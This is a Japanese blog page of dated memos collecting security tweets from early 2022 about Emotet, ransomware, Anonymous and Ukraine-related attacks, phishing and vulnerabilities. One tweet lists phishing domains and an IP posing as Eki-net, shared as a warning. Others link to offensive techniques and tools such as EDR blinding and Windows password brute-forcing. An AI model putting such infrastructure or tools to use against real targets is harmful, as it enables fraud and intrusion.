2022-03-13

2022/3/13 セキュリティ関連Twitterメモ

NVIDIA社員のパスワード数千件がネットに流出、ハッカー集団から奇妙な要求 | TechCrunch Japan https://t.co/AYo5jP70xa
— 辻伸弘 (nobuhiro tsuji) (@ntsuji) Mar 6, 2022

えきねっとのフィッシングサイトを確認しました。ご注意を。 ▼ドメイン ekunta[.]info eki-net.zenos.ekunta[.]info ekiunta[.]info eki-net.comuns.ekiunta[.]info ekiun[.]info eki-net.untas.ekiun[.]info ekinut[.]info eki-net[.]com.fitua.ekinut[.]info ▼IP 107.174.67.206 #Phishing https://t.co/b9iLxXX3g7
— にゃん☆たく (@taku888infinity) Mar 7, 2022

Splunkの検知用SPL集 Splunk活用しているSOCで検知力高度化するのに、活用できそうですね Detections https://t.co/rliiF0T7EK
— モグ｜セキュリティゼネラリスト (@moneymog) Mar 6, 2022

『クラウド脅威モデリングは、アタックサーフェスの特定及び削減を補い、さまざまなクラウドサービスプロバイダのセキュリティ要件の抽象化を支援し、リスク管理に役立てられます』翻訳WGが「クラウド脅威モデリング」を公開しました！ csajapan https://t.co/yKbZo9psv3
— モグ｜セキュリティゼネラリスト (@moneymog) Mar 6, 2022

Emotetが感染メールの配布に「メールアカウントの乗っ取り(Compromised account)」を使用している時点で、送信ドメイン認証(SPF,DKIM,DMARC)は全て使い物にならず他の対策が必要になるのに、DMARCに固執する連中なんなの？
— Kazunori ANDO (@ando_Tw) Mar 7, 2022

JUST IN: The hacking collective #Anonymous today hacked into the Russian streaming services Wink and Ivi (like Netflix) and live TV channels Russia 24, Channel One, Moscow 24 to broadcast war footage from #Ukraine. #TangoDown #OpRussia https://t.co/2V8opv7Dg9
— Anonymous TV ???? (@YourAnonTV) Mar 6, 2022

「ProjectWEB」の被害組織数を上方修正 - 富士通 https://t.co/sL2k3riMm4
— 辻伸弘 (nobuhiro tsuji) (@ntsuji) Mar 8, 2022

今さら聞けない！情報窃取型マルウェアの内部動作とJSOCの検知傾向 | セキュリティ対策のラック https://t.co/DSbqiiSQWT
— piyokango (@piyokango) Mar 8, 2022

ContiLeaksの概要まとめ | 調査研究/ブログ | 三井物産セキュアディレクション株式会社 https://t.co/5fOWJF2pbA
— piyokango (@piyokango) Mar 8, 2022

ブログ書きました。ロシアとベラルーシに向けられたアノニマスによるオペレーション #OpRedScare メモ | (n)inja csirt https://t.co/4qVhKwh3e1 https://t.co/ViE8DPRR6T
— 辻伸弘 (nobuhiro tsuji) (@ntsuji) Mar 9, 2022

過去のも含め、Contiの一連のリークで個人的に一番面白かったのは、Udemyとかでよくあるようなペネトレーションテスター向けの教育ビデオがそっくりそのままサイバー犯罪組織の人材育成用教材として使われていたという点かな。
— SttyK (@SttyK) Mar 9, 2022

「情報セキュリティ10大脅威 2022」解説書(PDF) https://t.co/DGKoZJqLCT 個人編、組織編両方の解説がまとまったものが公開されましたね。（今年もワイの本名載ってる～～） https://t.co/oGnByRfZFj
— にゃん☆たく (@taku888infinity) Mar 10, 2022

注意！「EMOTET」被害が拡大中https://t.co/zMV1McJiTK に載ってるグラフみると、活動停止期間中も結構検知しているんですよね。それってそれ以前から残っていた/感染していたものをようやくその時期に検知できるようになった、と。つまりは半年以上検知できない場合もあるってことですね…。 https://t.co/72knvz2fuB
— S-Owl (@Sec_S_Owl) Mar 10, 2022

Kaseya VSAの脆弱性を利用した攻撃を含む、複数のランサムウェア攻撃( Sodinokibi / REvil )の実施で逮捕された男性の身柄が米国に引き渡されテキサス州で起訴されたようです。 https://t.co/6ZPyNSawhm
— 辻伸弘 (nobuhiro tsuji) (@ntsuji) Mar 10, 2022

マルウェアEmotetの感染再拡大に関する注意喚起が@IPAjpや@jpcertから出されています。 3月に入り感染被害が急増しています。改めて適切な対策や対処ができているかの確認や点検を推奨します。 https://t.co/duZD6YZ2jW
— ラック公式 (@lac_security) Mar 10, 2022

ウクライナ侵攻とインターネット ? JPNIC Blog https://t.co/bUhbJMprNz
— takesako (y0sh1) (@takesako) Mar 12, 2022

登録者数が初の前年割れ、「情報処理安全確保支援士」の人気獲得に秘策はあるか https://t.co/JXcAdS68np 維持コストが高い、グローバルで使えない、国内でもそこまで持ってても役に立たないの他に、罰則事項がつくというのもありますよね。
— ほよたか (@takahoyo) Mar 10, 2022

サイバーセキュリティに関する総務大臣奨励賞受賞記念生配信をSpaceでやります！来週の3月15日（火）22時頃から！「ゆくアレくるアレ」ということでコレまでのアレとコレからのアレについて雑談ベースでワイワイやります。質問などあればハッシュタグ付けてツイート！ #セキュリティのアレ https://t.co/MAat9MiKWZ
— 辻伸弘 (nobuhiro tsuji) (@ntsuji) Mar 10, 2022

2,000万超の無停電電源装置「APC Smart-UPS」、リモート攻撃で物理破壊の恐れ | TECH+ https://t.co/H93xxM3pSs
— 辻伸弘 (nobuhiro tsuji) (@ntsuji) Mar 10, 2022

20分で分かるDirty Pipe（CVE-2022-0847） - knqyf263's blog https://t.co/SGfwkdkidp
— piyokango (@piyokango) Mar 11, 2022

個人的には『製造業へのローカル5G導入に伴うサイバーセキュリティリスク実証実験』が興味深かったです。制御システムセキュリティカンファレンス 2022 開催レポート https://t.co/EFhOWiacDr
— モグ｜セキュリティゼネラリスト (@moneymog) Mar 10, 2022

Emotet Redux - Lumen https://t.co/Auvn2hs5x4
— piyokango (@piyokango) Mar 10, 2022

43億倍という記録的な潜在増幅率持つ新しいDDoSベクトルの悪用確認 https://t.co/njQZQLoZBo
— モグ｜セキュリティゼネラリスト (@moneymog) Mar 11, 2022

ランサムウェア「REvil」を利用した22歳の男がアメリカに引き渡される、最大115年の懲役刑となる可能性 - GIGAZINE https://t.co/tC2d6LEIwh
— piyokango (@piyokango) Mar 11, 2022

Russia and the Global Internet | ThousandEyes https://t.co/3xwz7XBvBt
— Masafumi Negishi (@MasafumiNegishi) Mar 12, 2022

2022-03-05

2022/3/5 セキュリティ関連Twitterメモ

セキュリティ関連メモ

トレーニングプラットフォーム「BLUE TEAM LABS ONLINE」のご紹介: NECセキュリティブログ | NEC https://t.co/IDTY9cYf3F ログ分析やフォレンジックをゲーム形式で学んでみたい人にとっては良さそう
— ほよたか (@takahoyo) Feb 20, 2022

Blinding EDR On Windows #infosec #pentest #redteam https://t.co/zPetCyOfrR https://t.co/fK8t2cFDqT
— Florian Hansemann (@CyberWarship) Feb 20, 2022

Journey to Modern Security Operations: (https://t.co/zp84KwlQR1) https://t.co/vhrH7IFtfx
— Matt Soseman (@SosemanMatt) Feb 20, 2022

さっき気づいたのですが「情報処理安全確保支援士」の登録者数は減ってるのです。 2021/4/1で804名の新規登録で20,178名になっていたのに、2021/10/1で1,037名の新規登録で19,450名に減っているので、この時1,765名の登録解除があったようです。維持費かかる割にメリット少ないからかなあ。など。 https://t.co/wGcsofnKLq
— W.D. (@WD4096) Feb 20, 2022

病院の１割、対サイバー攻撃「脆弱機器」を未対策のまま使用…９割「脅威感じる」が対策追い付かず : 社会 : ニュース : 読売新聞オンライン https://t.co/xSTQECBhBv 上記記事が掲載されたYahooニュースでの森井教授のコメントとても良かったので共有です。 https://t.co/yf0PjMyjRa
— にゃん☆たく (@taku888infinity) Feb 21, 2022

無償で使えるセキュリティソフトやサービス一覧公開、米セキュリティ当局 | TECH+ https://t.co/bv25krdtn0
— にゃん☆たく (@taku888infinity) Feb 22, 2022

@DougMadory Oh wow, these attacks have a clear impact on their routing https://t.co/HmTtHLY7J4 https://t.co/qIXahNHSjB https://t.co/KND8yCTyqq
— Romain Fontugne (@romain_fontugne) Feb 24, 2022

家庭用ルーターなどIoT機器のマルウェア検査サービス「am I infected?」の無料提供を開始 https://t.co/azJNfrKbjA
— piyokango (@piyokango) Feb 24, 2022

AWS Lambdaのブログを書きました Lambdaの落とし穴 - 脆弱なライブラリによる危険性とセキュリティ対策 - Flatt Security Blog https://t.co/OPqEo3imAv
— morioka12 (@scgajge12) Feb 24, 2022

New Wiper Malware Targeting Ukraine Amid Russia's Military Operation https://t.co/GH7Z0sZrMN
— 辻伸弘 (nobuhiro tsuji) (@ntsuji) Feb 24, 2022

サイバー攻撃家庭などでも注意を “IoT機器”経由し攻撃も | NHKニュース https://t.co/Wp6pxqGBZ1
— piyokango (@piyokango) Feb 24, 2022

Win-Brute-Logon - Crack Any Microsoft Windows Users Password Without Any Privilege (Guest Account Included) https://t.co/iD4SWubID4 https://t.co/6OO9OUjgDq
— ? KitPloit - Hacker Tools (@KitPloit) Feb 24, 2022

ウクライナ危機とサイバー攻撃 - "最後に" 以降の文章を全人類に読んでもらいたい。 https://t.co/Fp3FiT5JjX
— 身代わり用 (@strinsert1Na) Feb 24, 2022

偽プレスリリースに「認知作戦」の影　サイバー情報戦の謎に迫った：朝日新聞デジタル https://t.co/O1aXqg5kLX
— モグ｜セキュリティゼネラリスト (@moneymog) Feb 24, 2022

HermeticWiper | New Destructive Malware Used In Cyber Attacks on Ukraine - SentinelOne https://t.co/NOcITv4xAu
— piyokango (@piyokango) Feb 24, 2022

才羽京子です。使わなくなったスマホのデータどうしていますか？端末の初期化だけでは、”おサイフケータイ”の電子マネー情報等のデータは残っている場合があります。スマホを転売、譲渡する際はご注意ください。使わなくなったスマホのデータは確実に消去しましょう。 #サイバーセキュリティは全員参加 https://t.co/fcgPjL7Xkq
— 京都府警察サイバー犯罪対策課 (@KPP_cyber) Feb 25, 2022

匿名のハッカー集団Anonymousが、ロシアにサイバー攻撃。昭和に逆戻りしたかのような戦争のなか、アノニマスのおかげで、やっと令和らしい戦争が始まったな。 https://t.co/0eN1obI8Jy
— 侍（318） (@ZanEngineer) Feb 25, 2022

Quick Reference Guide on Cyber Adversaries from Russia involved in offensive operations against Ukraine https://t.co/dUCEJK8O8d
— Will (@BushidoToken) Feb 25, 2022

Ukraine's Computer Emergency Response Team (CERT) details the phishing emails targeting Ukrainian military personnel and related individuals. https://t.co/Cf2s1pN3Hn
— Runa Sandvik (@runasand) Feb 25, 2022

Anonymous(アノニマス)がロシア、プーチンをサイバー攻撃する和訳あったので添付。映画かよ。 https://t.co/a8DgdFialx
— 光成@ブログ＆SNSで資産メディアを構築して雇われず生きる方法発信中 (@net_mitsunari) Feb 25, 2022

Contiは露骨にロシア側の味方をしています。（どこの国が関与しているか隠す気も無い様です）「Contiランサムウェアグループは「ロシア政府の全面的な支援」を表明し、ロシアに対して攻撃を仕掛ける者に対するサイバー攻撃を脅かしました」 https://t.co/H1CN8SDlRd
— キタきつね (@foxbook) Feb 25, 2022

ウクライナ政府サイトにDDoS攻撃、さらに数百台のウクライナのマシンにデータ削除を行う新しいマルウェアを発見 https://t.co/Y1jYNN9aqi
— モグ｜セキュリティゼネラリスト (@moneymog) Feb 25, 2022

ランサムウェアギャングである CONTI が「WARNING」というタイトルで声明を出しています。声明によると CONTI Teamはロシア政府を全面的に支持。ロシアに対してサイバー攻撃、戦争行為をするならば、その敵の重要インフラに反撃するため可能な限りのリソースを使うつもりである。とのこと。 https://t.co/vp4S8T1pxv
— 辻伸弘 (nobuhiro tsuji) (@ntsuji) Feb 25, 2022

国内外からの観測報告を見ると、ウクライナ、ロシアの双方に対して様々な手法によるDDoS攻撃が行われており、複数の IoT botnet も利用されているようです。推測ですが、これらの botnet は DDoS-as-a-Service として利用され、攻撃者はこれらのサービスを通じて攻撃を実施していると考えられます。
— Masafumi Negishi (@MasafumiNegishi) Feb 27, 2022

【発表】トヨタ、あす国内全工場を停止部品メーカーにサイバー攻撃 https://t.co/H5psCdgQ2o 3月1日に国内全工場の稼働を停止すると発表した。トヨタ車の部品メーカーがサイバー攻撃を受けたためだという。2日以降の稼働については、状況を見て判断するとしている。
— ライブドアニュース (@livedoornews) Feb 28, 2022

Tor has become popular in Ukraine - that’s a tripling in users https://t.co/LC8k1uluwe
— Alan Woodward (@ProfWoodward) Feb 28, 2022

* メタップスペイメントクレジットカード情報最大46万件流出ここクーポン ... - 選挙ドットコム https://t.co/G70hpGztOf https://t.co/vmc4zgEvRs
— セキュリティ・トレンド bot (@sec_trend) Feb 28, 2022

@ntsuji さん、 @piyokango さんと一緒にやっているポッドキャスト #セキュリティのアレですが、なんと、「サイバーセキュリティに関する総務大臣奨励賞」を受賞しました！総務省｜報道資料｜「サイバーセキュリティに関する総務大臣奨励賞」の受賞者の公表 https://t.co/LjBsueuktD
— Masafumi Negishi (@MasafumiNegishi) Feb 28, 2022

原因はまだわからないらしい。Tier1サプライヤーはトヨタと同等のセキュリティ対策が求められているはずだが、何が起きたのか。BCPは機能しなかったのか。 / “トヨタあす国内全工場の稼働停止へ取引先へのサイバー攻撃で | NHKニュース” https://t.co/0PdeWXGdnD
— 上原哲太郎/Tetsu. Uehara (@tetsutalow) Feb 28, 2022

いずれも深い分析の報告がされています。 YARA rules、IOC、各種ツールの共有もありますね！ JSAC2022開催レポート～DAY1～ https://t.co/IuDrvLb2ky
— モグ｜セキュリティゼネラリスト (@moneymog) Feb 28, 2022

トヨタ国内全工場で停止もあす再開へ取引先がウイルス確認 | NHKニュース https://t.co/6Sb5BtrtC9
— piyokango (@piyokango) Mar 1, 2022

「不正アクセスによる情報流出に関するご報告とお詫び」ーメタップスペイメント（2/28） https://t.co/4SvlWmZ5Hq
— キタきつね (@foxbook) Feb 28, 2022

IPAより「情報セキュリティ10大脅威 2022」が公開されました。 https://t.co/wdj6u8I46v 個人１位「フィッシングによる個人情報等の詐取」でした。これは重要なシグナルです。個人情報の価値が高まり市場が拡大していることを示唆しております。 https://t.co/xBMyiMEhyf
— 二本松哲也 (@t_nihonmatsu) Feb 28, 2022

『Microsoft Defender for Cloudは、セキュリティの状況を統合的に把握する「Cloud Security Posture Management 」（CSPM）と、ワークロードを脅威から保護する「Cloud Workload Protection」（CWP）の2つの機能から構成されるサービス』 https://t.co/LgxKjhiz4j
— モグ｜セキュリティゼネラリスト (@moneymog) Feb 28, 2022

ウクライナ侵攻：ウクライナIT部隊、サイバー戦線で反撃 | 毎日新聞 https://t.co/N6wYGFBpPj
— piyokango (@piyokango) Mar 1, 2022

ワクチン予約サイトにリバースブルートフォース攻撃 - 君津市（1ページ目 / 全1ページ）：Security NEXT https://t.co/O9Y33OnI6T
— 辻伸弘 (nobuhiro tsuji) (@ntsuji) Mar 3, 2022

『攻撃者が実際にXSSの脆弱性をついた攻撃を行った場合にどのようなリスクが生まれるか、具体的な例を4つほどご紹介』確かに、この辺ってあまり理解できていなかったので、勉強になります開発者が知っておきたい「XSSの発生原理以外」の話 - Flatt Security Blog https://t.co/vUJUigS6NW
— モグ｜セキュリティゼネラリスト (@moneymog) Mar 3, 2022

「ロシアをGitHubから切り離して」の意見に公式が返答　「私たちのビジョンは、全ての開発者のホームになること」 - ITmedia NEWS https://t.co/143VTuj1Mr
— piyokango (@piyokango) Mar 2, 2022

2022-02-20

2022/2/20 セキュリティ関連Twitterメモ

セキュリティ関連メモ

今週の最初の #Emotet のVT上での結果。 1日経って検出は4割強→7割強。検出が増える間にメールの情報は盗られてる。このhashは約10分程度のみの出現で、その先はまた別のhash。だからEmoCheckのような特化ツールが必要。サンプルは以下。 https://t.co/Fs2oDXPCue https://t.co/zNfLATLq7s https://t.co/tiCRTj4Dlu
— S-Owl (@Sec_S_Owl) Feb 8, 2022

ブログ書きました。この3つのランサムウェアに感染させられてしまった方の参考になればと思います。「Maze」「Egregor」「Sekhmet」によって暗号化されたファイルの復号メモ | (n)inja csirt https://t.co/ExZISqnZFo https://t.co/UifTL98GpU
— 辻伸弘 (nobuhiro tsuji) (@ntsuji) Feb 10, 2022

キヤノンやLGも襲ったMaze、Egregor、Sekhmetランサムウェアの復号キーが公開される | TechCrunch Japan https://t.co/wYruJCEIra
— piyokango (@piyokango) Feb 11, 2022

アップル、AirTagの悪用対策強化へ。不審なAirTagを見つける https://t.co/6CHKuUgZXW https://t.co/neQZvWCUvA
— Impress Watch (@impress_watch) Feb 11, 2022

サイバー攻撃、取り残される病院　「犯行声明、何者？」情報が来ない：朝日新聞デジタル https://t.co/B1nrVRfGok
— piyokango (@piyokango) Feb 12, 2022

FBI、ランサムウェアグループ「BlackByte」による被害に関する情報公開 https://t.co/tGatxOApuw
— モグ｜セキュリティゼネラリスト (@moneymog) Feb 15, 2022

NTTデータなど10社、AWSを活用して構築した金融機関のシステムのFISC安全対策基準対応リファレンスを公開 https://t.co/qw2FvrL1j4
— モグ｜セキュリティゼネラリスト (@moneymog) Feb 16, 2022

脆弱性管理ツール提供するSnyk、日本でのサービス提供開始 https://t.co/knmQHoCSN7
— モグ｜セキュリティゼネラリスト (@moneymog) Feb 16, 2022

一般的なプレースホルダ実装とは挙動が異なるので、「プレースホルダなら安全」とは言えない件。「JSON SQLインジェクション」と呼ばれた挙動に近い。 / “Node.jsのMySQLパッケージにおけるエスケープ処理だけでは防げない「隠れた」SQLインジェクション - Flatt Security …” https://t.co/EdceShLhfo
— 徳丸浩 (@ockeghem) Feb 16, 2022

はてなブログに投稿しました #はてなブログ 2022年2月に発生したウクライナへのDDoS攻撃についてまとめてみた - piyolog https://t.co/mqR20WnR6Z
— piyokango (@piyokango) Feb 16, 2022

Alert (AA22-047A) Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology | CISA https://t.co/qzbwh6jFi1
— piyokango (@piyokango) Feb 16, 2022

「オープンソース欠陥修正に弱点ソフト8に脆弱性」という残念なタイトルの記事が…。未知の脆弱性はどこにでもあり得るしオープンソース以外のソフトウェアでの割合と比較しないとアンフェア。記事の内容はオープンソースの脆弱性対応が有志頼みで利用者や企業が支援すべきという適切な内容なのに
— 森崎修司／ソフトウェアエンジニアリング研究者 (@smorisaki) Feb 17, 2022

脆弱性の修正にかかる平均時間は52日に短縮--グーグルのProject Zeroが報告 - ZDNet Japan https://t.co/YRukzUWbAl
— 辻伸弘 (nobuhiro tsuji) (@ntsuji) Feb 18, 2022

公的機関のサイトならhttps://t.co/TJc6gDAagJなりhttps://t.co/0V06KhxVKiを使えば安全なのに受託業者が勝手に汎用ドメインを取りたがる / “東京都が病院にポスターはがしを依頼した真相、ドメイン取引の怖い話” https://t.co/3GVKktTlAi
— Masanori Kusunoki / 楠正憲 (@masanork) Feb 18, 2022

How Trickbot works internally when it comes to targeting customers of 60 high-profile organizations? Read our technical research of three key Trickbot modules along with description of used evasion techniques. https://t.co/B45RTFX1zn
— Check Point Research (@_CPResearch_) Feb 19, 2022

2022-02-08

2022/2/8 セキュリティ関連Twitterメモ

セキュリティ関連メモ

ルートはメルカリでしたか。しかし、購入した「中古HD」のデータを復元してしまう”善意の”匿名通報者は、どういった方なのかも気になる所です。「元従業員の売却HDD内に業務文書、データ複製の連鎖で - ラック」 https://t.co/NYBjMVlRgm
— キタきつね (@foxbook) Jan 17, 2022

企業に仕掛けられた謎のRaspberry Piを追跡して実行犯を突き止めるまで https://t.co/FTAsNZ0685
— モグ｜セキュリティゼネラリスト (@moneymog) Jan 19, 2022

約5000の学校へ影響したランサムウェア事案へのFinalsite社による対応メモ https://t.co/iZ2ht2Q8KI
— モグ｜セキュリティゼネラリスト (@moneymog) Jan 19, 2022

明日はコインハイブ事件の最高裁判決です。弁論において弁護人が述べた内容を掲載しておきます https://t.co/HB3gq1IPb8
— スドー?? (@stdaux) Jan 19, 2022

良かった！ / “仮想通貨の無断「採掘」、逆転無罪　最高裁判決” https://t.co/Ee0XYzJcDD
— 齊藤貴義＠『Wizard Bible事件から考えるサイバーセキュリティ』 (@miraihack) Jan 20, 2022

Death from Above: Lateral Movement from Azure to On-Prem AD #infosec #pentest #redteam https://t.co/CSxHLl7I5D https://t.co/IWSgQDF3wD
— Florian Hansemann (@CyberWarship) Jan 20, 2022

Thanks to Firmware Scanner of our anti-rootkit set of techs we identified a new cyberattack #MoonBounce. The malicious implant is placed directly on SPI flash and is capable of persisting in the system across reboot or disk replacement. Details ?? https://t.co/L3TKVtzkro https://t.co/As800rR35X
— Eugene Kaspersky (@e_kaspersky) Jan 20, 2022

2022-01-20 (Thursday) - Two #Emotet infection examples with #spambot activity - One #epoch4 infection and one #epoch5 infection - #pcap files, malware samples, IOCs, and some email examples from the unencrypted spambot traffic available at: https://t.co/L16wVinByE https://t.co/Na3QujRz6F
— Brad (@malware_traffic) Jan 22, 2022

そういえば、弊社最近「オンサイト診断手当」なる社内制度が爆誕したみたいです。その名の通り、脆弱性診断員に特化した制度で、オンサイトで診断作業した際に別途特別手当がもらえるらしい。他の会社でこういうのあるのかな？個人的には「それで手当もらえるの？」ってちょっとビックリした。
— とある診断員 (@tigerszk) Jan 26, 2022

1月25日から新型DeadBoltランサムウェアがQNAP NASを標的に侵害中 https://t.co/avhJZvIs2D 真偽不明ですがゼロデイ脆弱性を悪用してるらしく、至急でインターネットからのアクセス制限を行う必要があります。WW/JPで327149/14990台外部公開か（図1 すでにWW/JPで約600/20が暗号化されています（図2 https://t.co/3IPt4z52xU
— nekono_nanomotoni (@nekono_naha) Jan 27, 2022

「サイバー攻撃受けた北朝鮮、6時間全てのインターネット通信網が停止」-Chosun online 朝鮮日報 https://t.co/im1NLPDb0h
— piyokango (@piyokango) Jan 27, 2022

情報セキュリティ10大脅威 2022 https://t.co/5Vh1qnn03p 個人の脅威1位がとうとうフィッシング詐欺になりました。 https://t.co/SepWkkD2Sk
— にゃん☆たく (@taku888infinity) Jan 27, 2022

セキュリティの見直しを命じられてて、Azure AD の運用項目一覧欲しいんですっていうのたまにお願いされるのですが、これでいいですね。 https://t.co/atnPcFHYA7
— Yusuke Kodama (@YusukeKodama85) Jan 28, 2022

NISCから、「東京2020大会におけるサイバーセキュリティ対策結果報告（総括）」が出てる。セキュリティ対策として、リスク対策や教育、大会中の活動、今後の活動、などが総括されていた。 https://t.co/GmGVFG7tQs
— 四川麻婆豆腐の海 (@hogehuga) Jan 28, 2022

講談社など、米ITを提訴へ　漫画サイト海賊版のデータ配信 https://t.co/nN0z7UwUuM
— piyokango (@piyokango) Jan 29, 2022

病院が攻撃されることはヤバイとなんとなくで言ってしまっている自分がいる気がしていたので調べました。メモしました。ブログに書きました。ある記事をきっかけに医療施設「徳島県つるぎ町立半田病院」について調べたメモ | (n)inja csirt https://t.co/ObC1BtITuP
— 辻伸弘 (nobuhiro tsuji) (@ntsuji) Jan 29, 2022

CISSP Cheatsheet Credit https://t.co/kU5t4ZToUw #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #CyberSec #networking #networksecurity #isaca #cybersecuritytraining https://t.co/4aC9Y7KQ8k
— Hacking Articles (@hackinarticles) Jan 30, 2022

Week 05 - 2022 #DFIR https://t.co/B2UYenNQun
— Phill Moore (@phillmoore) Jan 30, 2022

「ウイルス感染」にご用心　サポート詐欺、被害高止まり―国民生活センター：時事ドットコム https://t.co/2oDn3cOlxO
— Autumn Good (@autumn_good_35) Jan 31, 2022

実際にメールを送るフィッシング訓練は逆効果と、スイス・チューリッヒ工科大学の博士課程学生が従業員数数万人規模の企業と行った共同研究。訓練メールに引っかかった被験者は、実際のフィッシングにもより引っかかりやすくなったとのこと。 https://t.co/oUUClMtPNc
— kokum?t? (@__kokumoto) Jan 31, 2022

SambaにRCEの脆弱性CVE-2022-44142が発見。レポータがDEVCORE??さんということで要警戒 https://t.co/wVgEKm3XdZ Sambaを露出するサーバはWW/JPで183k/2.4kありますが影響を受けるv4.1以上に絞ると6.8k/1.5kになりますその殆どがVPSやレンサバで企業ユースは少なそうですが、1割程度はありそうです https://t.co/6BgGswQFmF
— nekono_nanomotoni (@nekono_naha) Feb 1, 2022

Windows Updateクライアント悪用してマルウェアに感染させる攻撃確認イバー攻撃 https://t.co/KbqaDrwkXN
— モグ｜セキュリティゼネラリスト (@moneymog) Feb 1, 2022

自社で受信する #Emotet の本日分を見た所いずれも新しい感染フローのものになっていましたまた弊社の場合、パターン（本文、送信元、ファイル配送方法）を変えて何度も特定宛先に送られて来ます。傾向は組織により異なる場合もありますが、一度受信したアドレスの監視は強化することをお勧めします https://t.co/7o41tIqxLy https://t.co/sFGajFTXRZ
— nekono_nanomotoni (@nekono_naha) Feb 2, 2022

子供が小学校から持って帰ってきた文書、セキュリティ側の人間からすると違和感しかない。 1年経ったから情報セキュリティの観点からパスワード変更？意味わからん。理由になってない。パスワードをこの紙に記載の上教師に提出？パスワードは個人に帰属でしょ。@Chigasaki_city #茅ヶ崎市 https://t.co/qSo2eafUTv
— hiro_ (@papa_anniekey) Feb 3, 2022

みんなパスワードに2020とか2021とか入れるようになりそうやな。そもそも子供に（というか大人にも）（オンライン攻撃に耐え得る）パスワードを決めさせ入力させるところに無理がある。Webサービスはログインしっぱなしにして、端末ロック解除（生体認証、PIN）で使うようにするべき。 https://t.co/vO37tmJPvV
— Hiromitsu Takagi (@HiromitsuTakagi) Feb 4, 2022

Cloud security standards #cybersecurity https://t.co/6gXWsmTrKZ
— LetsDefend (@LetsDefendIO) Feb 4, 2022

よく見るとアマ「ソ」ン…SMS使うフィッシング詐欺「スミッシング」被害急増　気づきづらい巧妙な手口 https://t.co/dwP1d0yb6N
— piyokango (@piyokango) Feb 5, 2022

BlackCatランサムは実行時にトークンを指定するようになっていて、そのトークンを使って実行、生成されたランサムノート（脅迫状）を見ないと交渉サイトのアドレスが分からないようにしているんですね。トークンを変更して何度か感染してみましたが生成されるアドレス（パラメータ）が異なってました。 https://t.co/LE7dNsBFh6
— 辻伸弘 (nobuhiro tsuji) (@ntsuji) Feb 6, 2022

北朝鮮が仮想通貨58億円盗む　サイバー攻撃で　国連安保理パネル | 毎日新聞 https://t.co/y2jrqsNaZR
— piyokango (@piyokango) Feb 6, 2022

サイバー攻撃と戦う人材育成や、国内の情報セキュリティ意識の向上を目指し、サイバーセキュリティに関わる仕事について分かりやすく紹介する『サイバーセキュリティ仕事ファイル 1』を公開しました。 https://t.co/b5Kot0vh5C ? ?#株式会社ラック #サイバーセキュリティ
— ラック公式 (@lac_security) Feb 7, 2022

PowerPointファイルを悪用して実行可能ファイルを配布する攻撃手法とは https://t.co/pKzketfDkN
— 辻伸弘 (nobuhiro tsuji) (@ntsuji) Feb 7, 2022

Emotet感染報告、国内企業から相次ぐ　ライオン、テスコムなど（要約） - ITmedia NEWS https://t.co/s7XrsNNBlU
— 辻伸弘 (nobuhiro tsuji) (@ntsuji) Feb 7, 2022

（社説）サイバー捜査　警察庁が担う重い課題：朝日新聞デジタル https://t.co/di2cBUuvuD
— モグ｜セキュリティゼネラリスト (@moneymog) Feb 7, 2022

報告書が公開される予定のようで期待。米政府、セキュリティ事件を検証する委員会を新設--最初の対象はLog4j - ZDNet Japan https://t.co/Rx2s0bzqkz
— 辻伸弘 (nobuhiro tsuji) (@ntsuji) Feb 7, 2022

The 3 Most Common Causes of Data Breaches in 2021 https://t.co/ygusSWoyDe #CyberSecurity #digital #Hackers #infosec @reach2ratan #malware #cloud #cloudsecurity #dataprotection #Privacy #infosec #informationsecurity #cloudcomputing https://t.co/xnCPZV88dv
— Ratan Jyoti (@reach2ratan) Feb 7, 2022

2022-01-18

2022/1/18 セキュリティ関連Twitterメモ

セキュリティ関連メモ

Today, we're open sourcing a log4j JAR scanner. Throw it at a filesystem, detect vulnerable JARs, and even rewrite them in place. Includes a Go API to import the JAR parsing for other applications. https://t.co/TWC4SJFm3p
— Eric Chiang (@erchiang) Dec 29, 2021

Best of Cyber Security #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #internet #networking #riskmanagement #compliance https://t.co/9CSDbhO8xq
— Hacking Articles (@hackinarticles) Jan 1, 2022

はてなブログに投稿しました #はてなブログ Windowsイベントログ解析ツール「Hayabusa」を使ってみる - itiblog https://t.co/23QwmMhF61
— いちび (@itiB_S144) Dec 31, 2021

ねんきんネットパスワードだけでなく、秘密の質問と答えまで定期変更を要求される?? https://t.co/kugqxGEC86
— ipusiron＠『Wizard Bible事件から考えるサイバーセキュリティ』 (@ipusiron) Dec 31, 2021

「箱根駅伝」で検索すると、偽の動画サイトからクレジットカード情報を盗まれる詐欺サイトが出ています。まずは動画配信各社の公式サイトに行って、そこから探すようにしてください。 YouTube: https://t.co/6UKodGBgNR 日テレ: https://t.co/bHAWXleFzs #フィッシング #phishing #箱根駅伝 #詐欺 https://t.co/ZQtq0NltjS
— Osumi, Yusuke (@ozuma5119) Jan 3, 2022

Azure Privilege Escalation via Azure API Permissions Abuse #infosec #pentest #redteam https://t.co/uMLobqbLmL https://t.co/TsSzLdvOYg
— Florian Hansemann (@CyberWarship) Jan 3, 2022

Hacking Tool CheatSheet #infosec #cybersecurity #Pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #Infosys #CyberSec #INTERNET #hacking #tools https://t.co/24xVwIDy5T
— PentestSky (@pentestsky) Jan 2, 2022

オシント新時代・荒れる情報の海：／4　ディープフェイク、脅威拡大（その1）　顔認証、容易に突破　無料アプリで合成動画 | 毎日新聞 https://t.co/HVrfAvjigg
— piyokango (@piyokango) Jan 3, 2022

対応に当たった方々本当にお疲れ様でした。この件ではいくつの課題と教訓が浮き彫りになったのではないかと思います。その1つとしてIT化された業務に支障を来した場合の回避、緩和策の準備が挙げられると思います。これは病院だけに言えることではありません。 https://t.co/ffn5ap9w5A
— 辻伸弘 (nobuhiro tsuji) (@ntsuji) Jan 5, 2022

Amazonや宅配装うSMS攻撃3倍に　ドコモなど対策急ぐ: 日本経済新聞 https://t.co/SSTI2DAPWn
— piyokango (@piyokango) Jan 5, 2022

はてなブログに投稿しました #はてなブログ氏名と生年月日でパスワードを割り出していたSNSの不正アクセス事案についてまとめてみた - piyolog https://t.co/5RtEPYBis7
— piyokango (@piyokango) Jan 10, 2022

オシント新時代～荒れる情報の海：卒業証書、停電、リュック…　何気ないSNS投稿に潜む落とし穴 | 毎日新聞 https://t.co/RNYQGEl08E
— piyokango (@piyokango) Jan 10, 2022

